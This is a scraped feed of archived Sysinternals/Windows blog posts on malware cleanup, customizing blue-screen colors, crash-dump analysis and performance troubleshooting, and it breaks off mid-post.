style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="304" /> </P> <P> Now he had to determine how User32.dll was compromised. User32.dll is one of the system “Known DLLs”, which means that as a performance optimization Windows creates a file mapping at boot time that can then be used by any process that loads the DLL. These known DLLs are listed in a registry key that Autoruns lists in the KnownDLLs tab, so the engineer went back to the Autoruns scan to take a closer look. The most effective way to spot potential malware when using Autoruns is to run it with the Verify Code Signatures option set, which has Autoruns check the digital signature of the images it finds. Upon closer inspection, the engineer noticed that User32.dll, unlike the rest of the Known DLLs, did not have a valid digital signature: </P> <P> <IMG alt="image" border="0" height="329" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8080.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121287iEB738A00B027F764" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The compromised User32.dll behaved almost identically to the actual User32.dll, otherwise applications with user-interfaces would fail, but it seemed to be different enough to cause it to query the alternate registry location. To verify this, he ran the <A href="#" target="_blank"> Sysinternals Sigcheck </A> utility on the tweaked copy and on one from a different, uninfected, system that was running the same release of Windows. A side-by-side comparison of the output, which includes MD5, SHA-1 and SHA-256 cryptographic hashes of the file, confirmed they were different: </P> <P> <IMG alt="image" border="0" height="199" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4604.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121288i7F8907A3F9C16093" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="550" /> </P> <P> As a final check to make sure that the difference was indeed responsible for the different behavior, the engineer decided to scan the strings in the DLL. Any registry keys and values, as well as file names, used by an executable will be stored in the executable’s image file and be visible to a string-scanning tool. He tried using the <A href="#" target="_blank"> Sysinsternals Strings </A> utility, but the sharing violation error prevented Strings from opening the compromised User32.dll, so he turned to Process Explorer. When you open the DLL view for a process and open the properties of a DLL, Process Explorer shows the printable strings on the Strings tab. The results, which revealed the modified APPInit_DLLs string, validated his theory: </P> <P> <IMG alt="clip_image002[4]" border="0" height="466" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3443.clip_5F00_image002_5B00_4_5D005F00_thumb.jpg" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121289iACF942F5DEBD0DFE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="clip_image002[4]" width="154" /> <IMG alt="image" border="0" height="460" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8420.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121290i353D3C4D1F5B8A77" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="154" /> </P> <P> With the knowledge of exactly how the malware’s primary DLL activated, the engineer set out to clean the malware off the system. Because User32.dll would be locked by the malware whenever Windows was online (otherwise you can rename the file and replace it, which is what the malware did), he booted the Windows Preinstallation Environment (WinPE) off a CD-ROM and from there copied a clean User32.dll over the malicious version. Then he deleted the associated malware files he’d discovered in his investigation. When through, he rebooted the system and verified that the system was clean. He closed the case by giving the hospital network administrators the cleaning steps he’d followed and submitted the malware to the Microsoft antimalware team so that they could incorporate automated cleaning into Forefront and the Malicious Software Removal Toolkit. He’d solved a seemingly impossible case by applying several Sysinternals utilities and helped the hospital get back to normal operation. </P> </BODY></HTML> Thu, 27 Jun 2019 07:10:51 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-malicious-autostart/ba-p/723990 MarkRussinovich 2019-06-27T07:10:51Z Announcing Zero Day, the Novel! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-zero-day-the-novel/ba-p/723978 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 18, 2011 </STRONG> <BR /> <P> You’ve seen the news if you’re <A href="#" target="_blank"> my friend on Facebook </A> , <A href="#" target="_blank"> follow me on Twitter </A> , or subscribe to the <A href="#" target="_blank"> Sysinternals blog </A> : I’m proud to announce that my first novel, a cyberthriller entitled <I> Zero Day </I> , is due to be published by St. Martin’s Press in mid-March. If you like the <A href="#" target="_blank"> Sysinternals tools </A> , the articles I post on this blog, are interested in computer security, or just enjoy a heart-stopping thriller, I think you’ll like Zero Day. You can find out more and pre-order on the <A href="#" target="_blank"> Zero Day web site </A> and I've started a <A href="#" target="_blank"> Zero Day blog </A> there that will focus exclusively on book and cybersecurity news and tips. <A href="#" target="_blank"> Pre-order now </A> to guarantee a copy on release day and pass the word to your friends! </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 07:09:41 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-zero-day-the-novel/ba-p/723978 MarkRussinovich 2019-06-27T07:09:41Z “Blue Screens” in Designer Colors with One Click https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/8220-blue-screens-8221-in-designer-colors-with-one-click/ba-p/723977 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 09, 2011 </STRONG> <BR /> <P> My <A href="#" target="_blank"> last blog post </A> described how to use local kernel debugging to change the colors of the Windows crash screen, also known as the “blue screen of death”. No doubt many of you thought that showing off a green screen of death or red screen of death to your friends and family would be fun, but the steps involved too complicated. </P> <P> <A href="#" target="_blank"> Alex Ionescu </A> , one of my coauthors on <A href="#" target="_blank"> Windows Internals, 5th Edition </A> (he’s also coauthoring the 6th edition with me and <A href="#" target="_blank"> Dave Solomon </A> , which covers Windows 7 and Windows Server 2008 R2 – scheduled for release this summer), suggested that we make it easy for people to enjoy blue screens of any color. We did so by modifying <A href="#" target="_blank"> Notmyfault </A> , a buggy driver demonstration tool that I wrote for the book and my crash dump analysis presentations. Simply make your color section in the new BSOD color picker dialog, press the “Do Bug” button, and enjoy your creation: </P> <P> <IMG alt="image" border="0" height="451" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0601.image_5F00_thumb_5F00_28A7EF37.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121279i85726C4F0444ACE9" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="550" /> </P> <P> Here’s the “blue screen” that results from the above color choice: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0028.image_5F00_thumb_5F00_344A47D7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121280i409A1BE47A3D5FFD" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> It’s as easy as that - there’s no need to tweak large-page settings or perform any other system configuration changes like those described in <A href="#" target="_blank"> my last blog post </A> . </P> <P> How does it work? We extended Notmyfault’s kernel-mode driver (named Myfault.sys, as seen on the crash screen, to highlight the fact that user-mode code cannot directly cause a system crash) to register a “ <A href="#" target="_blank"> bugcheck callback </A> ”. When the system crashes it invokes driver-registered callbacks so that they can add data to the crash dump that can help troubleshooters get information about device or driver state at the time of a crash. The Myfault.sys callback executes just after the blue screen paints and changes the colors to the ones passed to it by Notmyfault by changing the default VGA palette entries used by the Boot Video driver. </P> <P> Now with no awkward and error-prone fiddling in a kernel debugger, you can impress your friends and family with a blue screen painted in your favorite colors (though they might be even more impressed if you change the colors by fiddling in the kernel debugger)! </P> <P> To download the latest copy of Notmyfault (both 32-bit and 64-bit versions) click <A href="#" target="_blank"> here </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:09:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/8220-blue-screens-8221-in-designer-colors-with-one-click/ba-p/723977 MarkRussinovich 2019-06-27T07:09:37Z A Bluescreen By Any Other Color https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/a-bluescreen-by-any-other-color/ba-p/723974 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 13, 2010 </STRONG> <BR /> <P> Note: for an easier way to customize the blue screen’s colors, see my next blog post, “ <A href="#" target="_blank"> Blue Screens in Designer Colors with One Click </A> ”. </P> <P> Seeing a bluescreen that’s not blue is disconcerting, even for me, and based on the reaction of the TechEd audiences, I bet you’ll have fun generating ones of a color you pick and showing them off to your techy friends. I first saw <A href="#" target="_blank"> Dan Pearson </A> do this in a crash dump troubleshooting talk he delivered with <A href="#" target="_blank"> Dave Solomon </A> a couple of years ago and now close my <A href="#" target="_blank"> Case of the Unexplained </A> presentations with a bluescreen of the color the audience choses (you can hear the audience’s response at the end of <A href="#" target="_blank"> this recording </A> , for example). Note that the steps I’m gong to share for changing the color of the bluescreen are manual and only survive a boot session, so are suitable for demonstrations, not for general bluescreen customization. Be sure to check out the special holiday bluescreen I’ve prepared for you at the end of the post. </P> <H3> Preparing the System </H3> <P> Because you’re going to modify kernel code, the first step is to enable the ability to edit kernel code in memory if it’s not already enabled. Windows systems with less than 2 GB of RAM uses 4KB pages to store kernel code, so can protect pages with the protection most suitable for the contents they contain. For instance, kernel data pages should allow both read and write access while kernel code should only allow read and execute access. As an optimization that helps improve the speed of virtual address translations, Windows uses large pages (4 MB on x86 and x64) on larger systems. That means that if there’s both code and data stored in a page, the page must allow read, write and execute accesses, so to ensure that you can edit a page, you have to encourage Windows to use large pages. If your system is Windows XP or Server 2003 and has less than 256 MB, or is Windows Vista or higher and has 2 GB or less of RAM, create a REG_DWORD value called LargePageMinimum that’s set to 1 under HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management: </P> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6622.image_5F00_thumb_5F00_300C2376.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121266i9FE582C0F7DE10D5" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> So that you don’t have to rush to show off your handiwork before Windows automatically reboots after the crash, change the auto-reboot setting. On Windows XP and Server 2003, right-click on My Computer, select the Advanced Tab, and press the Settings button in the “Startup and Recovery” section. On Windows Vista and higher, right-click on Computer in the Start Menu, select properties to open the Properties dialog, click Advanced System Settings, select the Advanced tab and press the Settings button in the “Startup and Recovery” section. Finally, uncheck the “Automatically restart” checkbox: </P> <P> <IMG alt="SNAGHTML5fc0cb41_thumb2" border="0" height="296" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4578.SNAGHTML5fc0cb41_5F00_thumb2_5F00_thumb_5F00_081395A5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121267i8979053247E39DCC" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="SNAGHTML5fc0cb41_thumb2" width="354" /> </P> <P> If you’re running 64-bit Windows Vista or higher, you need to boot the system in Debug mode so that you can run the kernel debugger in “local” mode. You can do that either by selecting F8 during the system boot and choosing the Debug boot or by checking the Debug checkbox in the System Configuration (Msconfig) utility: </P> <P> <IMG alt="image_thumb31" border="0" height="196" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8304.image_5F00_thumb31_5F00_thumb_5F00_40BE3FB2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121268i3781007D6D454DE4" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb31" width="404" /> </P> <P> Next, reboot the system and start the debugger with administrator rights (if UAC is on, run it as administrator). Point the debugger at the Microsoft symbol server by opening the Symbol Search Path dialog under the File menu and enter this string: srv*c:\symbols*<A href="#" target="_blank">http://msdl.microsoft.com/download/symbols</A> (replace c:\symbols with whatever local directory in which you want the debugger to store cached symbols). Next, open the Kernel Debugging dialog from the File menu, click the Local page, and press OK: </P> <P> <IMG alt="image_thumb33" border="0" height="352" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4087.image_5F00_thumb33_5F00_thumb_5F00_27563C78.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121269i52D2D098DC333819" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb33" width="404" /> </P> <P> The subsequent steps vary depending on whether you’re running 32-bit or 64-bit Windows and whether it’s Windows Vista or newer. </P> <H3> 32-bit Windows XP and Windows Server 2003 </H3> <P> The function that displays the bluescreen on these operating systems is KeBugCheck2. You’re looking for the place where the function passes the color value to the function that fills the screen background, InbvSolidColorFill. Enter the command “u kebugcheck2” to list the start of the function, then enter the “u” command to dump additional pages of the function’s code until you see the reference to InbvSolidColorFill (after entering “u” once, you can just press enter to repeat the command). You’ll need to dump 30-40 pages before you come across the one with the call: </P> <P> <IMG alt="image" border="0" height="252" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4722.image_5F00_thumb_5F00_71D536E6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121270iB7C453EC3CE70335" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Preceding the call, you’ll see an instruction that has the number 4 as its argument (“push 4”), as you can see above. Copy the code address of that instruction by selecting it from the address column on the left and typing Ctrl+C. Then in the debugger command window, type “eb “, then Ctrl+V to paste the address, then “+1”, then enter. The debugger will go into memory editing mode, starting with the address of the color value. Now you can choose the color you want. 1 is red, 2 is green, and you can experiment if you want a different color. Simply enter the number and press enter twice to commit it and exit editing mode. Here’s what the screen should look like after you’re done: </P> <P> <IMG alt="image_thumb38" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8228.image_5F00_thumb38_5F00_thumb_5F00_02D964CA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121271i51C96D640474F5DB" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb38" width="550" /> </P> <H3> 64-bit Versions of Windows and 32-bit Windows Vista and Higher </H3> <P> On these versions of Windows, the core bluescreen drawing function is KiDisplayBlueScreen. Type “u kidisplaybluescreen” and then continue entering “u” commands to dump pages of the function until you see the call to InbvSolidColorFill. On 32-bit versions of Windows, continue by following the instructions given in the Windows XP/Server 2003 section to find and edit the color value. On 64-bit versions of these operating systems, the instruction preceding the call to InvbSolidColorFill is the one that passes the color, so copy its address (the number in the left column) and enter this command to edit it: “eb &lt;address&gt;+4”. The debugger will go into memory editing mode and you can change the value (e.g. 1 for red, 2 for green): </P> <P> <IMG alt="image_thumb42" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2350.image_5F00_thumb42_5F00_thumb_5F00_28CF1520.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121272i0003B69134F84A5C" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb42" width="550" /> </P> <H3> Viewing the Result </H3> <P> You’re now ready to crash the system. If you’re running 64-bit Windows, you might get a crash without doing anything additionally. That’s because <A href="#" target="_blank"> Kernel Patch Protection </A> will notice the modification and crash the system as a deterrent to ISVs that might consider modifying the kernel’s code to change its behavior. There might be a delay of up to several minutes before that happens, though. To generate a crash on demand, run the Notmyfault tool (you can download it from the Windows Internals <A href="#" target="_blank"> book page </A> ) and press the “Do Bug” button (to avoid data loss, make sure you’ve saved any work and closed all other applications): </P> <P> <IMG alt="image_thumb45" border="0" height="365" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7120.image_5F00_thumb45_5F00_thumb_5F00_4CDFB9D9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121273iCF3EDAB74C0B896E" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb45" width="204" /> </P> <P> You’ll now get a bluescreen in the color you picked, in this case the red screen of death: </P> <P> <IMG alt="image_thumb47" border="0" height="413" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7462.image_5F00_thumb47_5F00_thumb_5F00_5577CEF9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121274iB47C7FB058479DBB" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb47" width="550" /> </P> <H3> The Holiday Bluescreen </H3> <P> In the spirit of the holiday season, I took things one step further to generate a holiday-themed bluescreen: not only did I modify the background color, but the text color as well. To do this on 64-bit versions of Windows Vista or higher, note the call to InvbSetTextColor immediately following the one to InvbSolidColorFill and the address of the instruction that passes the text color to the function, “move ecx, 0Fh”: </P> <P> <IMG alt="image" border="0" height="215" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0537.image_5F00_thumb_5F00_660FC9E7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121276i15F41B8B68BC4CB6" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The 0Fh parameter represents white, but you can change it using the same editing technique. Use the “eb” command, passing the address of the instruction plus 1. Here I set the color to red (which is a value of 1): </P> <P> <IMG alt="image" border="0" height="75" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1780.image_5F00_thumb_5F00_4BCF60C3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121277iFFC9CFB2306EEDB0" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="279" /> </P> <P> And here’s the festive bluescreen I produced: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8535.image_5F00_thumb_5F00_63F2CB1E.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121278iBFD86D3383F8DB7F" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Happy holidays! And remember, if you have any troubleshooting cases you want to share, please send me screenshots (.PNG preferred) and log files. </P> </BODY></HTML> Thu, 27 Jun 2019 07:09:20 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/a-bluescreen-by-any-other-color/ba-p/723974 MarkRussinovich 2019-06-27T07:09:20Z The Cases of the Blue Screens: Finding Clues in a Crash Dump and on the Web https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-cases-of-the-blue-screens-finding-clues-in-a-crash-dump-and/ba-p/723960 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 12, 2010 </STRONG> <BR /> <P> <IMG align="right" alt="image" border="0" height="158" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8168.image_5F00_2BCD71AF.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121259iF9836063DF3CCDE9" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; float: right; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="100" /> My last <A href="#" target="_blank"> couple of posts </A> have looked at the lighter side of blue screens by showing you how to customize their colors. Windows kernel mode code reliability has gotten better and better every release such that many never experience the infamous BSOD. But if you have had one (one that you didn’t purposefully trigger with Notmyfault, that is), as I explain in my <A href="#" target="_blank"> Case of the Unexplained presentations </A> , spending a few minutes to investigate might save you the inconvenience and possible data loss caused by future occurrences of the same crash. In this post I first review the basics of crash dump analysis. In many cases, this simple analysis leads to a buggy driver for which there’s a newer version available on the web, but sometimes the analysis is ambiguous. I’ll share two examples administrators sent me where a Web search with the right key words lead them to a solution. </P> <P> Debugging a crash starts with downloading the Debugging Tools for Windows package (part of the <A href="#" target="_blank"> Windows SDK </A> – note that you can do a web install of just the Debugging Tools instead of downloading and installing the entire SDK), installing it, and configuring it to point at the Microsoft symbol server so that the debugger can download the symbols for the kernel, which are required for it to be able to interpret the dump information. You do that by opening the symbol configuration dialog under the File menu and entering the symbol server URL along with the name of a directory on your system where you’d like the debugger to cache symbol files it downloads: </P> <P> <IMG alt="image" border="0" height="295" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1031.image_5F00_thumb_5F00_7977FB6D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121260i25E7444F50C41B97" style="background-image: none; border-bottom: 0px; border-left: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The next step is loading the crash dump into the debugger Open Crash Dump entry in the File menu. Where Windows saves dump files depends on what version of Windows you’re running and whether it’s a client or server edition. There’s a simple rule of thumb you can follow that will lead you to the dump file regardless, though, and that’s to first check for a file named Memory.dmp in the %SystemRoot% directory (typically C:\Windows); if you don’t find it, look in the %SystemRoot%\Minidumps directory and load the newest minidump file (assuming you want to debug the latest crash). </P> <P> When you load a dump file into the debugger, the debugger uses heuristics to try and determine the cause of the crash. It points you at the suspect by printing a line that says “Probably caused by:" with the name of the driver, Windows component, or type of hardware issue. Here’s an example that correctly identifies the problematic driver responsible for the crash, myfault.sys: </P> <P> <IMG alt="image" border="0" height="145" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8507.image_5F00_thumb_5F00_1E01EE09.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121261iEAB697066AED5075" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> In my talks, I also show you that clicking on the !analyze -v hyperlink will dump more information, including the kernel stack of the thread that was executing when the crash occurred. That’s often useful when the heuristics fail to pinpoint a cause, because you might see a reference to a third-party driver that, by being active around the site of the crash, might be the guilty party. Checking for a newer version of any third-party drivers displayed in this basic analysis often leads to a fix. I documented a troubleshooting case that followed this pattern in a previous blog post, <A href="#" target="_blank"> The Case of the Crashed Phone Call </A> . </P> <P> When you don’t find any clues, perform a Web search with the textual description of the crash code (reported by the !analyze -v command) and any key words that describe the machine or software you think might be involved. For example, one administrator was experiencing intermittent crashes across a Citrix server farm. He didn’t realize he could even look at a crash dump file until he saw a Case of the Unexplained presentation. After returning to his office from the conference, he opened dumps from several of the affected systems.&nbsp; Analysis of the dumps yielded the same generic conclusion in every case, that a driver had not released kernel memory related to remote user logons (sessions) when it was supposed to: </P> <P> <IMG alt="image" border="0" height="139" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1256.image_5F00_thumb_5F00_0FC37519.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121262iED827115415B987C" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Hoping that a Web search might offer a hint and not having anything to lose, he entered “session_has_valid_pool_on_exit and citrix” in the browser search box. To his amazement, the very first result was a Citrix Knowledge Base fix for the exact problem he was seeing, and the article even displayed the same debugger output he was seeing: </P> <P> <IMG alt="image" border="0" height="290" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1050.image_5F00_thumb_5F00_2F724EE1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121263i2BC1FF91CC7515F9" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> After downloading and installing the fix, the server farm was crash-free. </P> <P> In another example, an administrator saw a server crash three times within several days. Unfortunately, the analysis didn’t point at a solution, it just seemed to say that the crash occurred because some internal watchdog timer hadn’t fired within some time limit: </P> <P> <IMG alt="image" border="0" height="275" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3618.image_5F00_thumb_5F00_6412AB1C.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121264i9C8F685109AB2F9E" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="429" /> </P> <P> Like the previous case, the administrator entered the crash text into the search engine and to his relief, the very first hit announced a fix for the problem: </P> <P> <IMG alt="image" border="0" height="370" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6431.image_5F00_thumb_5F00_1CBD552A.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121265i64A63E2B0FD8E692" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="479" /> </P> <P> The server didn’t experience any more crashes subsequent to the application of the listed hotfix. </P> <P> These cases show that troubleshooting is really about finding clues that lead you to a solution or a workaround, and those clues might be obvious, require a little digging, or some creativity. In the end it doesn’t matter how or where you find the clues, so long as you find a solution to your problem. </P> </BODY></HTML> Thu, 27 Jun 2019 07:07:57 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-cases-of-the-blue-screens-finding-clues-in-a-crash-dump-and/ba-p/723960 MarkRussinovich 2019-06-27T07:07:57Z The Case of the Slow Project File Opens https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-project-file-opens/ba-p/723952 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 06, 2010 </STRONG> <BR /> <P> If you’ve seen one of my Case of the Unexplained presentations (like the one I delivered at TechEd Europe last month that’s posted for <A href="#" target="_blank"> on-demand viewing </A> ), you know that I emphasize how thread stacks are a powerful troubleshooting tool for diagnosing the root cause of performance problems, buggy behavior, crashes and hangs (I provide a brief explanation of what a stack is in the TechEd presentation). That’s because often times the explanation for a process’s behavior lies in the code it loads, either explicitly like in the case of DLLs it depends on, or implicitly like for processes that host extensions. This case is another demonstration of successful stack troubleshooting. It also shows how a little time troubleshooting to get a couple of clues can quickly lead to a solution. </P> <P> The case opened when the customer, a network administrator, contacted Microsoft support because a user reported that Microsoft Project files located on a network share were taking up to a minute to open and about 1 in 10 times the open resulted in an error: </P> <P> <IMG alt="image" border="0" height="147" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3704.image_5F00_thumb_5F00_0D203821.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121250iE90D8AEE193B3ED1" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="384" /> </P> <P> The administrator verified the issue, checked networking settings and latency to the file server, but could not find anything that would explain the problem. The Microsoft support engineer assigned to the case asked the administrator to capture a <A 